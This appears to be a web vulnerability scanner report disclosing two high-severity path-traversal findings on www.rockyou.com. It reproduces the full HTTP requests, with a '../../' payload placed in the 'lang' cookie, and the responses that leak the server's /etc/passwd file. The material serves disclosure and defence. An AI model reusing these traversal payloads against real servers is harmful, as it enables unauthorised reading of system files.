1.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]
1.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]
Severity: | High |
Confidence: | Firm |
Host: | http://www.rockyou.com |
Path: | /fxtext/fxtext-create.php |
GET /fxtext/fxtext-create.php HTTP/1.1 Host: www.rockyou.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lastlogin=1303164637; lang=en../../../../../../../.. |
HTTP/1.1 200 OK Date: Mon, 18 Apr 2011 23:51:27 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.6 Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com Set-Cookie: lastlogin=1303170687; expires=Wed, 27-Jul-2011 23:51:27 GMT; path=/; domain=.rockyou.com Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com Vary: Accept-Encoding,User X-RyHeader: www202.rockyou.com took D=7180 microseconds to serve this request P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 85570 root:x:0:0:root:/root:/bin bin:x:1:1:bin:/bin:/sbin daemon:x:2:2:daemon:/sbin adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdow ...[SNIP]... ucp:/sbin/nologin operator:x:11:0:operator: games:x:12:100:games:/usr gopher:x:13:30:gopher: ftp:x:14:50:FTP User:/var/ftp:/sbin nobody:x:99:99:Nobody:/:/sbin dbus:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapp ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.rockyou.com |
Path: | /show_my_gallery.php |
GET /show_my_gallery.php HTTP/1.1 Host: www.rockyou.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lastlogin=1303164637; lang=en../../../../../../../.. |
HTTP/1.1 302 Found Date: Mon, 18 Apr 2011 23:51:04 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.6 Location: show_my_gallery2.php? Set-Cookie: ctid=1; expires=Mon, 25-Apr-2011 23:51:04 GMT; path=/; domain=.rockyou.com Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com Set-Cookie: lastlogin=1303170664; expires=Wed, 27-Jul-2011 23:51:04 GMT; path=/; domain=.rockyou.com Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com Vary: Accept-Encoding,User X-RyHeader: www202.rockyou.com took D=9310 microseconds to serve this request P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17248 root:x:0:0:root:/root:/bin bin:x:1:1:bin:/bin:/sbin daemon:x:2:2:daemon:/sbin adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdow ...[SNIP]... ucp:/sbin/nologin operator:x:11:0:operator: games:x:12:100:games:/usr gopher:x:13:30:gopher: ftp:x:14:50:FTP User:/var/ftp:/sbin nobody:x:99:99:Nobody:/:/sbin dbus:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapp ...[SNIP]... |